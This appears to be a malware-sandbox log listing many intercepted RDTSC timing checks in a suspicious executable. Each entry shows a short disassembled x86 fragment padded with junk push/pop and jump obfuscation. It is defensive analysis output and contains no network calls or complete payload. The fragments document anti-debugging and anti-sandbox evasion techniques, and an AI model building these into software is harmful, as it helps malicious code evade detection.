Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C77B9 second address: 10C7814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 je 00007F87BC5165B6h 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jmp 00007F87BC5165BFh 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnp 00007F87BC5165CCh 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BC5165C0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C7814 second address: 10C7818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CB9C3 second address: 10CB9D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CB9D4 second address: 10CB9DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBCC7 second address: 10CBCCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBCCC second address: 10CBCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F87BD02CC86h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBCE3 second address: 10CBCE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBCE7 second address: 10CBD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BD02CC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F87BD02CC99h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBD0C second address: 10CBD16 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F87BC5165C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBD16 second address: 10CBD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBD1C second address: 10CBD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F87BC5165C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBD3A second address: 10CBD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CBEDB second address: 10CBEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CC038 second address: 10CC03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CC03C second address: 10CC054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F87BC5165C2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CC359 second address: 10CC373 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F87BD02CC86h 0x00000008 jg 00007F87BD02CC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F87BD02CC8Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CC373 second address: 10CC3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F87BC5165BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007F87BC5165B6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CC4EA second address: 10CC4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 106263B second address: 106263F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CF46C second address: 10CF472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CF472 second address: 10CF496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F87BC5165C1h 0x0000000b jmp 00007F87BC5165BAh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CF496 second address: 10CF49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10CF49C second address: 10CF4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D510C second address: 10D5111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5111 second address: 10D5116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5116 second address: 10D511C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D53E6 second address: 10D5420 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F87BC5165BCh 0x0000000c js 00007F87BC5165B6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F87BC5165CBh 0x0000001b jmp 00007F87BC5165BAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D56C1 second address: 10D572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC99h 0x00000009 popad 0x0000000a jmp 00007F87BD02CC94h 0x0000000f jnp 00007F87BD02CC88h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push ecx 0x00000018 jmp 00007F87BD02CC91h 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 jmp 00007F87BD02CC8Ah 0x00000027 pop edx 0x00000028 pushad 0x00000029 jmp 00007F87BD02CC8Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D572D second address: 10D5739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BC5165B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5739 second address: 10D573E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D58C0 second address: 10D58D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5B8F second address: 10D5BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC95h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5BB0 second address: 10D5BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F87BC5165C0h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f je 00007F87BC5165B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5D22 second address: 10D5D32 instructions: 0x00000000 rdtsc 0x00000002 je 00007F87BD02CC88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5ED8 second address: 10D5EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5EDE second address: 10D5EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D5EE2 second address: 10D5F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F87BC5165C2h 0x0000000c push esi 0x0000000d jmp 00007F87BC5165BEh 0x00000012 je 00007F87BC5165B6h 0x00000018 pop esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D607A second address: 10D607E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10D607E second address: 10D6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DACDB second address: 10DAD0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F87BD02CC98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F87BD02CC92h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAD0E second address: 10DAD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAD14 second address: 10DAD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F87BD02CC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAD20 second address: 10DAD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F87BC5165BEh 0x0000000b jnl 00007F87BC5165B6h 0x00000011 jc 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAE9D second address: 10DAEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F87BD02CC86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAEB0 second address: 10DAEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DB279 second address: 10DB298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAA09 second address: 10DAA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAA0D second address: 10DAA15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DAA15 second address: 10DAA1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DFEE5 second address: 10DFEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DFEE9 second address: 10DFEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DFEED second address: 10DFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F87BD02CC88h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DFEFB second address: 10DFF18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10DFF18 second address: 10DFF47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BD02CC99h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1059E83 second address: 1059E9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F87BC5165C3h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E51B8 second address: 10E51C2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F87BD02CC86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4036 second address: 10E4042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F87BC5165B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4042 second address: 10E4047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4047 second address: 10E404E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A352C second address: 10A3553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3553 second address: 10A3575 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F87BC5165B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F87BC5165BAh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3575 second address: 10A3579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3579 second address: 10A357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A357F second address: 10A35E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F87BD02CC86h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F87BD02CC88h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 adc cl, 00000048h 0x0000002c call 00007F87BD02CC89h 0x00000031 pushad 0x00000032 jbe 00007F87BD02CC97h 0x00000038 jmp 00007F87BD02CC91h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F87BD02CC91h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A35E8 second address: 10A35EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3755 second address: 10A3763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3763 second address: 10A3768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A38A2 second address: 10A38BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC97h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A38BD second address: 10A38F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F87BC5165C6h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F87BC5165BAh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A38F1 second address: 10A38F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3B16 second address: 10A3B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F87BC5165B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 movsx edi, di 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007F87BC5165BDh 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A3B62 second address: 10A3B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A43A0 second address: 10A43A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A43A4 second address: 1085F17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 sub edi, 642EB8FCh 0x0000000e call dword ptr [ebp+12DC1BB2h] 0x00000014 jmp 00007F87BD02CC98h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007F87BD02CC86h 0x00000022 jne 00007F87BD02CC86h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4451 second address: 10E4456 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4456 second address: 10E4463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F87BD02CC86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4463 second address: 10E4485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165C5h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E45FA second address: 10E4600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4600 second address: 10E4604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4898 second address: 10E48AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BD02CC8Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48AB second address: 10E48B5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F87BC5165B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48B5 second address: 10E48BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48BB second address: 10E48C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48C1 second address: 10E48C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48C5 second address: 10E48D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F87BC5165C6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E48D8 second address: 10E48DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4A16 second address: 10E4A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4B8D second address: 10E4BA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F87BD02CC88h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10E4BA0 second address: 10E4BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F87BC5165B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F87BC5165C2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
